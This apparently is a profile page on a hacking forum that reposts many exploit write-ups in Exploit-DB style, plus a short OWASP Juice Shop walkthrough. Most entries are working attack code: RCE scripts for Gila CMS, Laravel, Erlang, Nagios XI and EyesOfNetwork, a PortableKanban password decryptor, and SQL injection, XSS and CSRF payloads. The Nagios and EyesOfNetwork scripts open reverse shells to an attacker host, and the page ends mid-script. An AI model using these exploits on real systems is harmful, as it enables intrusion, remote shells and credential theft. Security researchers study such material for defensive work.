Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval # Date: 9 Jan 2021 # Exploit Author: rootabeta # Vendor Homepage: The original page, https://dmitryivanov.net/, cannot be found at this time of writing. The vulnerable software can be downloaded from https://www.softpedia.com/get/Office-tools/Diary-Organizers-Calendar/Portable-Kanban.shtml # Software Link: https://www.softpedia.com/get/Office-tools/Diary-Organizers-Calendar/Portable-Kanban.shtml # Version: Tested on: 4.3.6578.38136. All versions that use the similar file format are likely vulnerable. # Tested on: Windows 10 x64. Exploit likely works on all OSs that PBK runs on. # PortableKanBan stores credentials in an encrypted format # Reverse engineering the executable allows an attacker to extract credentials from local storage # Provide this program with the path to a valid PortableKanban.pk3 file and it will extract the decoded credentials import json import base64 from des import * #python3 -m pip install des import sys try: path = sys.argv[1] except: exit("Supply path to PortableKanban.pk3 as argv1") def decode(hash): hash = base64.b64decode(hash.encode('utf-8')) key = DesKey(b"7ly6UznJ") return key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8') with open(path) as f: try: data = json.load(f) except: #Start of file sometimes contains junk - this automatically seeks valid JSON broken = True i = 1 while broken: f.seek(i,0) try: data = json.load(f) broken = False except: i+= 1 for user in data["Users"]: print("{}:{}".format(user["Name"],decode(user["EncryptedPassword"])))
  2. HireHackking

    Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated) # Date: 1.12.2021 # Exploit Author: Enesdex # Vendor Homepage: https://gilacms.com/ # Software Link: https://github.com/GilaCMS/gila/releases/tag/2.0.0 # Version: x < 2.0.0 # Tested on: Windows 10 import requests import time target_url = "http://192.168.1.101:80/Gila/" cmd = "calc.exe" url = target_url+"?c=admin" cookies = {"GSESSIONID": "../../index.php"} headers = {"User-Agent": "<?php shell_exec('"+cmd+"'); include 'src\\core\\bootstrap.php'; ?>"} requests.get(url, headers=headers, cookies=cookies) time.sleep(5) requests.get(target_url+"/index.php")
  3. HireHackking

    Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection # Date: 08-01-2021 # Exploit Author: Jaimin Gondaliya # Vendor Homepage: https://www.prestashop.com # Software Link: https://www.prestashop.com/en/download # Version: Prestashop CMS - 1.7.7.0 # Tested on: Windows 10 Parameter: id_product Payload: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt) Exploit: http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)
  4. HireHackking

    SmartAgent 3.1.0 - Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SmartAgent 3.1.0 - Privilege Escalation # Date: 01-11-2021 # Exploit Author: Orion Hridoy # Vendor Homepage: https://www.smartagent.io/ # Version: Build 3.1.0 # Tested on: Windows 10/Kali Linux A Low grade user like ViewOnly can create an account with SuperUser permission. Steps To Reproduce: 1. Create a user with ViewOnly 2. Visit https://demo.localhost.com/#/CampaignManager/users 3. Now you will be able to create an account with SuperUser. #Python Exploit [Replace With Your Authorization Code] import requests session = requests.Session() rawBody = "{\"username\":\"orion@hridoy.com \",\"password\":\"Orionhridoy69\",\"appName\":\"AppEngage\",\"role\":\"Admin\",\"android\":\"1\",\"ios\":\"0\",\"kai\":\"0\"}" headers = {"Authorization":"id=orion@gmail.com,engageToken=eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJvcmlvbkBnbWFpbC5jb20iLCJyb2xlcyI6WyJWaWV3T25seSJdLCJhcHBOYW1lIjoiQXBwRW5nYWdlIiwicGxhdGZvcm0iOiJBTkRST0lEIiwiaXNzIjoiRU5BR0FHRSIsImlhdCI6MTYxMDM3NDEyMCwiZXhwIjoxNjExMjM4MTIwfQ.SbnZaRe3-2GOFOm7QDzvIBQCKBAK_GV-wKsMoH4GGChyjUFe2Ij4LiVl5rXsWRfTqNnJXj9fFxYTzkD2-kXlAQ","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":"https://demo.localhost.com/","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Content-Type":"application/json"} response = session.post("https://demo.localhost.com/api/createUser", data=rawBody, headers=headers) print("User Created With\nUser: orion@hridoy.com\nPass: Orionhridoy69")
  5. HireHackking

    Cemetry Mapping and Information System 1.0 - Multiple SQL Injections

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cemetry Mapping and Information System 1.0 - Multiple SQL Injections # Exploit Author: Mesut Cetin # Date: 2021-01-12 # Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code # Affected Version: 1.0 # Vulnerable parameter: "Search" bar (POST method) # Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 SQL Injection is a type of an injection attack that makes it possible to execute malicious SQL statements. Due to unsanitized user input, the attacker can retrieve the entire SQL database in this case. Explanation: The function "person.php" takes user input through the search bar at line 45: "$_POST['search']" and uses it without any sanitization for the following SQL statement (line 46-49): $sql = "SELECT * FROM tblpeople WHERE FNAME LIKE '%".$search."%'"; $mydb->setQuery($sql); $cur = $mydb->executeQuery(); $numrows = $mydb->num_rows($cur);//get the number of count A single quote (') at the search bar under http://localhost/CemeteryMapping/index.php?q=person will result in SQL synthax errors. Proof of Concept: Since the php code lacks of sanitization of the user input, multiple SQL injection queries can be found. 1. Boolean-based SQL injection POST request the page /CemeteryMapping/index.php?q=person and use as payload: ' or 1=1 -- search=' or 1=1 -- 2. Union-based SQL injection To retrieve sensitive files like /etc/passwd, use the following payload at the search bar (POST request http://localhost/CemeteryMapping/index.php?q=person): search=' UNION SELECT NULL,load_file('/etc/passwd'),NULL,NULL,NULL,NULL,NULL-- - If you want to enumerate the target system further, replace "load_file('/etc/passwd')" with one of the following MySQL commands: @@hostname : Current Hostname @@tmpdir : Temp Directory @@datadir : Data Directory @@version : Version of DB @@basedir : Base Directory user() : Current User database() : Current Database version() : Version schema() : current Database UUID() : System UUID key current_user() : Current User current_user : Current User system_user() : Current System user session_user() : Session user @@GLOBAL.have_symlink : Check if Symlink is enabled or disabled @@GLOBAL.have_ssl : Check if it have SSL or not 3. Time-based SQL injection For time-based SQL injection, use the payload: ' AND (SELECT 2634 FROM (SELECT(SLEEP(5)))muaN)-- - Mitigation: By using prepared statements and parameterized queries, the SQL injection can be prevented.
  6. HireHackking

    Erlang Cookie - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Erlang Cookie - Remote Code Execution # Date: 2020-05-04 # Exploit Author: 1F98D # Original Author: Milton Valencia (wetw0rk) # Software Link: https://www.erlang.org/ # Version: N/A # Tested on: Debian 9.11 (x64) # References: # https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ # # Erlang allows distributed Erlang instances to connect and remotely execute commands. # Nodes are permitted to connect to eachother if they share an authentication cookie, # this cookie is commonly called ".erlang.cookie" # #!/usr/local/bin/python3 import socket from hashlib import md5 import struct import sys TARGET = "192.168.1.1" PORT = 25672 COOKIE = "XXXXXXXXXXXXXXXXXXXX" CMD = "whoami" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET, PORT)) name_msg = b"\x00" name_msg += b"\x15" name_msg += b"n" name_msg += b"\x00\x07" name_msg += b"\x00\x03\x49\x9c" name_msg += b"AAAAAA@AAAAAAA" s.send(name_msg) s.recv(5) # Receive "ok" message challenge = s.recv(1024) # Receive "challenge" message challenge = struct.unpack(">I", challenge[9:13])[0] print("Extracted challenge: {}".format(challenge)) challenge_reply = b"\x00\x15" challenge_reply += b"r" challenge_reply += b"\x01\x02\x03\x04" challenge_reply += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest() s.send(challenge_reply) challenge_res = s.recv(1024) if len(challenge_res) == 0: print("Authentication failed, exiting") sys.exit(1) print("Authentication successful") ctrl = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex" msg = b'\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k' msg += struct.pack(">H", len(CMD)) msg += bytes(CMD, 'ascii') msg += b'jw\x04user' payload = b'\x70' + ctrl + msg payload = struct.pack('!I', len(payload)) + payload print("Sending cmd: '{}'".format(CMD)) s.send(payload) print(s.recv(1024))
  7. HireHackking

    Online Movie Streaming 1.0 - Admin Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Movie Streaming 1.0 - Admin Authentication Bypass # Exploit Author: Richard Jones # Date: 2021-01-13 # Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 #Exploit URL: http://TARGET/onlinemovies/Plogin.php POST /onlinemovies/Plogin.php HTTP/1.1 Host: TARGET Content-Type: application/x-www-form-urlencoded Content-Length: 48 Origin: http://TARGET Connection: close Cookie: PHPSESSID=p09pmo49cb8dr0s75r1jhttlvj Upgrade-Insecure-Requests: 1 mail=admin%40a.com&pass=ad`'+or+1=1+--+-a&login=
  8. HireHackking

    Online Hotel Reservation System 1.0 - Admin Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Hotel Reservation System 1.0 - Admin Authentication Bypass # Exploit Author: Richard Jones # Date: 2021-01-13 # Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 #Exploit URL: http://TARGET/marimar/admin/index.php Host: TARGET POST /marimar/admin/login.php HTTP/1.1 Content-Length: 57 Connection: close Cookie: PHPSESSID=82sevuai2qhh9h8b5jbucn0616 email=admin%27+or+1%3D1+--+-ac1d&pass=asdasdasd&btnlogin=
  9. HireHackking

    Online Shopping Cart System 1.0 - 'id' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Shopping Cart System 1.0 - 'id' SQL Injection # Date: 14.1.2021 # Exploit Author: Aydın Baran Ertemir # Vendor Homepage: https://www.sourcecodester.com/php/14668/online-shopping-cart-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14668&title=Online+Shopping+Cart+System+in+PHP+with+Full+Source+Code # Version: 1.0 # Tested on: Kali Linux Use SQLMAP: sqlmap -u "localhost/cart_remove.php?id=1" --dbs --batch --level 3 --risk 3
  10. HireHackking

    Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated) # Date: 19/12/2020 # Exploit Author: Haboob Team (https://haboob.sa) # Vendor Homepage: https://www.nagios.com/products/nagios-xi/ # Version: Nagios XI 5.7.x # Tested on: (Ubuntu 18.04 / PHP 7.2.24) & Vendor's custom VM # CVE: CVE-2020-35578 #!/usr/bin/python3 # pip3 install bs4 lxml import requests import sys import warnings from bs4 import BeautifulSoup import base64 import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) if len(sys.argv) != 6: print("[~] Usage : python3 nagiosxi-rce.py http(s)://url username password reverse_ip reverse_port") print("[~] Example : python3 nagiosxi-rce.py https://192.168.224.139 nagiosadmin P@ssw0rd 192.168.224.138 443") exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] ip = sys.argv[4] port = sys.argv[5] request = requests.session() def login(): # Request nsp value (Nagios Session Protection, used to prevent CSRF attacks) nsp_str_req = request.get(url+"/nagiosxi/login.php", verify=False) content = nsp_str_req.text soup = BeautifulSoup(content, "lxml") nsp_str = soup.find_all('input')[0].get('value') print("[+] Extract login nsp token : %s" % nsp_str) # Login login_info = { "nsp": nsp_str, "pageopt": "login", "username": username, "password": password } login_request = request.post(url + "/nagiosxi/login.php", login_info, verify=False) login_text = login_request.text # Check Login Status if "Core Config Manager" in login_text: return True else: print("[-] Login ... Failed!") return False def execute_payload(): # Request nsp value (Nagios Session Protection, used to prevent CSRF attacks) print("[+] Request upload form ...") nsp_str_req = request.get(url+"/nagiosxi/admin/monitoringplugins.php", verify=False) content = nsp_str_req.text soup = BeautifulSoup(content, "lxml") nsp_str = soup.find_all('input')[1].get('value') print("[+] Extract upload nsp token : %s" % nsp_str) # Payload Base64 Encoding payload_decoded = "bash -i >& /dev/tcp/%s/%s 0>&1" % (ip, port) payload_bytes = payload_decoded.encode('ascii') base64_bytes = base64.b64encode(payload_bytes) payload_encoded = base64_bytes.decode('ascii') payload = ";echo " + payload_encoded + " | base64 -d | bash;#" print("[+] Base64 encoded payload : %s" % payload) # Payload Execution multipart_form_data = { 'upload': (None, '', None), 'nsp': (None, nsp_str, None), 'uploadedfile': (payload, 'whatever', 'text/plain'), 'convert_to_unix': (None, '1', None), } print("[+] Sending payload ...") print("[+] Check your nc ...") rce = request.post(url +"/nagiosxi/admin/monitoringplugins.php", files=multipart_form_data, verify=False) if login(): print("[+] Login ... Success!") execute_payload()
  11. HireHackking

    Laravel 8.4.2 debug mode - Remote code execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Laravel 8.4.2 debug mode - Remote code execution # Date: 1.14.2021 # Exploit Author: SunCSR Team # Vendor Homepage: https://laravel.com/ # References: # https://www.ambionics.io/blog/laravel-debug-rce # https://viblo.asia/p/6J3ZgN8PKmB # Version: <= 8.4.2 # Tested on: Ubuntu 18.04 + nginx + php 7.4.3 # Github POC: https://github.com/khanhnv-2091/laravel-8.4.2-rce #!/usr/bin/env python3 import requests, sys, re, os header={ "Accept": "application/json" } data = { "solution":"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\ "parameters":{ "variableName":"cm0s", "viewFile":"" } } def clear_log(url='', viewFile=''): global data data['parameters']['viewFile'] = viewFile while (requests.post(url=url, json=data, headers=header, verify=False).status_code != 200): pass requests.post(url=url, json=data, headers=header, verify=False) requests.post(url=url, json=data, headers=header, verify=False) def create_payload(url='', viewFile=''): global data data['parameters']['viewFile'] = viewFile resp = requests.post(url=url, json=data, headers=header, verify=False) if resp.status_code == 500 and f'file_get_contents({viewFile})' in resp.text: return True return False def convert(url='', viewFile=''): global data data['parameters']['viewFile'] = viewFile resp = requests.post(url=url, json=data, headers=header, verify=False) if resp.status_code == 200: return True return False def exploited(url='', viewFile=''): global data data['parameters']['viewFile'] = viewFile resp = requests.post(url=url, json=data, headers=header, verify=False) if resp.status_code == 500 and 'cannot be empty' in resp.text: m = re.findall(r'\{(.|\n)+\}((.|\n)*)', resp.text) print() print(m[0][1]) def generate_payload(command='', padding=0): if '/' in command: command = command.replace('/', '\/') command = command.replace('\'', '\\\'') os.system(r'''php -d'phar.readonly=0' ./phpggc/phpggc monolog/rce1 system '%s' --phar phar -o php://output | base64 -w0 | sed -E 's/./\0=00/g' > payload.txt'''%(command)) payload = '' with open('payload.txt', 'r') as fp: payload = fp.read() payload = payload.replace('==', '=3D=') for i in range(padding): payload += '=00' os.system('rm -rf payload.txt') return payload def main(): if len(sys.argv) < 4: print('Usage: %s url path-log command\n'%(sys.argv[0])) print('\tEx: %s http(s)://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log \'id\''%(sys.argv[0])) exit(1) if not os.path.isfile('./phpggc/phpggc'): print('Phpggc not found!') print('Run command: git clone https://github.com/ambionics/phpggc.git') os.system('git clone https://github.com/ambionics/phpggc.git') url = sys.argv[1] path_log = sys.argv[2] command = sys.argv[3] padding = 0 payload = generate_payload(command, padding) if not payload: print('Generate payload error!') exit(1) if 'http' not in url and 'https' not in url: url = 'http'+url else: url = url+'/_ignition/execute-solution' print('\nExploit...') clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s'%(path_log)) create_payload(url, 'AA') create_payload(url, payload) while (not convert(url, 'php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=%s'%(path_log))): clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s'%(path_log)) create_payload(url, 'AA') padding += 1 payload = generate_payload(command, padding) create_payload(url, payload) exploited(url, 'phar://%s'%(path_log)) if __name__ == '__main__': main()
  12. HireHackking

    WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS) # Date: 14/01/2021 # Exploit Author: Rahul Ramakant Singh # Vendor Homepage: https://ghozylab.com/plugins/ # Software Link: https://demo.ghozylab.com/plugins/easy-contact-form-plugin/ # Version: 1.1.7 # Tested on Windows Steps: 1. Install WordPress 5.6 2. Install and activate *Contact Form Plugin* plugin. 3. Go to * Contact Form Plugin *plugin section and click on the add new form button. 4. Fill all required details and click on the save button and capture the request in a proxy tool like burp suite. 6. Append the JavaScript payload in the "Email Header" field as mentioned below *"<sc><svg/onload=alert(454)>"* 5. You will observe that the payload successfully got stored and reflected into the response and the malicious JavaScript payload got executed successfully and we are getting a pop-up.
  13. HireHackking

    Title: Owasp juice shop (2) Shooting range difficulty ⭐

    HireHackking posted a blog entry in Hacker Technology
    In the previous article, we talked about the installation of Owasp juice shop. This article will follow my cousin’s footsteps to get through the level! This article mainly talks about the difficulty of one-star pass strategy. Bonus Payload(Payload) Description: Use reward payment load in the DOM XSS challenge. payload: Just copy the code to the search box. iframe width='100%' height='166' scrolling='no' frameborder='no' allow='autoplay' src='https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076color=%23ff5500auto_play=truehide_related=falseshow_comments=trueshow_user=trueshow_reposts=falseshow_teaser=true'/iframe DOM XSS Description: DOM-based XSS attack payload: iframe src='javascript:alert(`xss`)' Confidential Files Description: Check confidential documents We clicked about us and found a hyperlink. Click on the hyperlink and grab the packet in burp. Modify the contents in front of ftp. You can see the following file information. Click to read in turn and this level will be passed. Bully Chatbot This level is very simple, which means chatting with the robot and obtaining a discount coupon. When the content of the chat post contains a code, the robot will send you a discount coupon. Exposed Metrics Description: Find out the server data obtained by backend services using common monitoring software By accessing the documents in the official website, you can check the default backend entry address (localhost:3000/metrics). Missing Encoding Description: Retrieve photos of Bjoern cat 'Brave Mode'. Click on the photo wall and found that an image was not loaded. The image review element found that the url of the image is img _ngcontent-utp-c241='' class='image' src='assets/public/images/uploads/-#zatschi-#whoneedsfourlegs-1572600969477.jpg' alt=' #zatschi #whoneedsfourlegs' The image here has not been parsed because the URL contains special conformity needs and performs a conversion, which will cause some exceptions. Here, change # in the url to %23. Outdated Allowlist Search for keyword redirect in js file? Just visit the url. Repetitive Registration Click the registration page, review element button, and delete disabled='true'. At this time, we only enter the user name and the others are empty, so we can register directly. Zero Stars Click on the customer feedback page to review the elements of the button, remove disabled='true' At this time, we only need to enter the verification code to submit.
  14. HireHackking

    PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message) # Date: 2020-12-21 # Exploit Author: Mohamed Oosman B S # Vendor Homepage: https://www.php-fusion.co.uk/ # Software Link: https://www.php-fusion.co.uk/phpfusion_9_downloads.php # Version: 9.03.90 and below # Tested on: Windows 10 # CVE : CVE-2020-35687 1. Description: PHP-Fusion version 9.03.90 is vulnerable to CSRF attack which leads to deletion of shoutbox messages by the attacker on behalf of the logged in victim. 2. Proof of Concept As the requests for deleting the admin shoutbox are sent using the GET method, the CSRF attack to delete an attacker-controlled shoutbox message can be performed by having the admin visit https://TARGET.com/infusions/shoutbox_panel/shoutbox_archive.php?s_action=delete&shout_id=1 directly, after getting to know the shout_id of the message, as it is sequential. <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://TARGET/infusions/shoutbox_panel/shoutbox_archive.php"> <input type="hidden" name="s&#95;action" value="delete" /> <input type="hidden" name="shout&#95;id" value="3" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  15. HireHackking

    Online Hotel Reservation System 1.0 - 'id' Time-based SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Hotel Reservation System 1.0 - 'id' Time-based SQL Injection # Exploit Author: Mesut Cetin # Date: 2021-01-14 # Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 ######## Description ######## Vulnerable to SQL Injection. // vulnerable parameter at include/room.php, line 25: $mydb->setQuery("SELECT * FROM ".self::$tbl_name." Where `ROOMID`= {id} LIMIT 1"); ######## Proof of Concept ######### The 'id' parameter at http://localhost/marimar/admin/mod_room/index.php?view=edit&id=11 is vulnerable to time-based SQL injection. Payload: (select*from(select(sleep(10)))a) Proof of Concept: http://localhost/marimar/admin/mod_room/index.php?view=edit&id=(select*from(select(sleep(10)))a)
  16. HireHackking

    Online Hotel Reservation System 1.0 - 'description' Stored Cross-site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Hotel Reservation System 1.0 - Stored Cross-site Scripting # Exploit Author: Mesut Cetin # Date: 2021-01-14 # Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 ######## Description ######## The room 'description' parameter is vulnerable to stored Cross-site Scripting. ######## Proof of Concept ######### Login with administrator credentials at http://localhost/admin with admin:admin and click on "Rooms" tab. Edit "description" parameter: 1<script>alert('document.cookie')</script> Any user at http://localhost/marimar/index.php will get the XSS pop-up warning with their cookie values.
  17. HireHackking

    Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF) # Exploit Author: Mesut Cetin # Date: 2021-01-14 # Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 ######## Description ######## Vulnerable to Cross-site request forgery (CSRF), can lead to full account takeover of Administrator account. ######## Proof of Concept ######### Send the victim the following PoC: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/marimar/admin/mod_users/controller.php?action=edit" method="POST"> <input type="hidden" name="USERID" value="1" /> <input type="hidden" name="UNAME" value="Anonymous" /> <input type="hidden" name="USERNAME" value="admin" /> <input type="hidden" name="deptid" value="" /> <input type="hidden" name="UPASS" value="admin" /> <!-- change this to the new password you wish --> <input type="hidden" name="ROLE" value="Administrator" /> <input type="hidden" name="deptid" value="" /> <input type="hidden" name="PHONE" value="912852478" /> <input type="hidden" name="save" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  18. HireHackking

    EyesOfNetwork 5.3 - File Upload Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: EyesOfNetwork 5.3 - File Upload Remote Code Execution # Date: 10/01/2021 # Exploit Author: Ariane.Blow # Vendor Homepage: https://www.eyesofnetwork.com/en # Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso # Version: 5.3-10 (12/9/2020-lastest) #!/bin/bash # (/!\) You may have change this string : "user_id=1; user_limitation=0; group_id=1" if you are not the admin user in the admin group, you find this in the cookies params /!\ ############################################### # (Authentified) # # Abritraty file upload # # It whase a Challenge to do that in BASH # # But the exploit's working fine ! # # ........... # # Exploit is working with the actual version # # Scripted on 01/10/2021 # # By Ariane.Blow # # https://ariane.agency/ # ############################################### banner() { clear echo " ,*-." echo ' | |' echo ' ,. | |' echo ' | |_| | ,.' echo ' `---. |_| |' echo ' | .--`' echo " | |" echo " | |" echo ""Ω echo " ! DO NOT USE IF YOU DONT HAVE PERSMISSION !" echo "" echo " EyesOfNetwork 5.3-10" echo "" echo " RedTeam Tool" echo "" echo " Input verification desertion" echo "" echo " RCE via Arbitrary FileUpload" echo "" echo "" } VAR() { #var #Beacause I don't whant to see all the *.sh in my OPT directory ... BashMan Tips xD ! mkdir /tmp/EON53 cd /tmp/EON53 #you can not upload more than 1 file with a same URL and same filename, i just add a random char at the end of URL and in the filename export random=$(cat /dev/urandom | tr -dc 'bcdfghjklmnpqrstvwxz' | head -c 9) export filename=shell$random.xml.php echo "EyesOfNetwork IP :" read eonIP echo "HackerIP (used to start the listener) :" read hackerIP echo "Hacker PORT (used to start the listener):" read PORT echo "Username (default = admin) :" read username echo "password :" read password } #Getting the session_id GetSessionID() { echo "getting sessionID ... " echo "curl -i -s -k -X $'POST' -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://$eonIP/login.php' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 20' -H $'Origin: https://$eonIP' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' --data-binary $'login=$username&mdp=$password' $'https://$eonIP/login.php' | grep session | cut -d ';' -f 1 | cut -d '=' -f 2" >> GetSession.sh chmod +x GetSession.sh sessionID=$(./GetSession.sh) echo "sessionID acquired : $sessionID" sleep 3 echo } #start listener start_listen() { printf "\e[31;1m When the Reverse-Shell is etablished, you can PrivEsc with :\e[0m \n" echo "echo 'os.execute(\"/bin/sh\")' > /tmp/nmap.script" echo "sudo nmap --script=/tmp/nmap.script" printf "\e[31;1m ... I Know ... \e[0m \n" echo "gnome-terminal -e 'nc -lnvp $PORT'" >> listen.sh chmod +x listen.sh ./listen.sh } #POST payload Payload() { echo "Sending PostRequest ..." echo "curl -i -s -k -X $'POST' \ -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Type: multipart/form-data; boundary=---------------------------123135855827554554412483984802' -H $'Content-Length: 1565' -H $'Origin: https://$eonIP' -H $'Connection: close' -H $'Referer: https://$eonIP/module/admin_itsm/modification_itsm.php' -H $'Cookie: session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \ -b $'session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \ --data-binary $'-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_url_id\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_url\"\x0d\x0a\x0d\x0ahttp://HackMe.ImFamous$random\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"fileName\"; filename=\"$filename\"\x0d\x0aContent-Type: text/xml\x0d\x0a\x0a<?php\x0d\x0aexec(\"/bin/bash -c \'bash -i > /dev/tcp/$hackerIP/$PORT 0>&1\'\");\x0a\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"input_file_name\"\x0d\x0a\x0d\x0ashell.xml\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_type_request\"\x0d\x0a\x0d\x0aget\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; 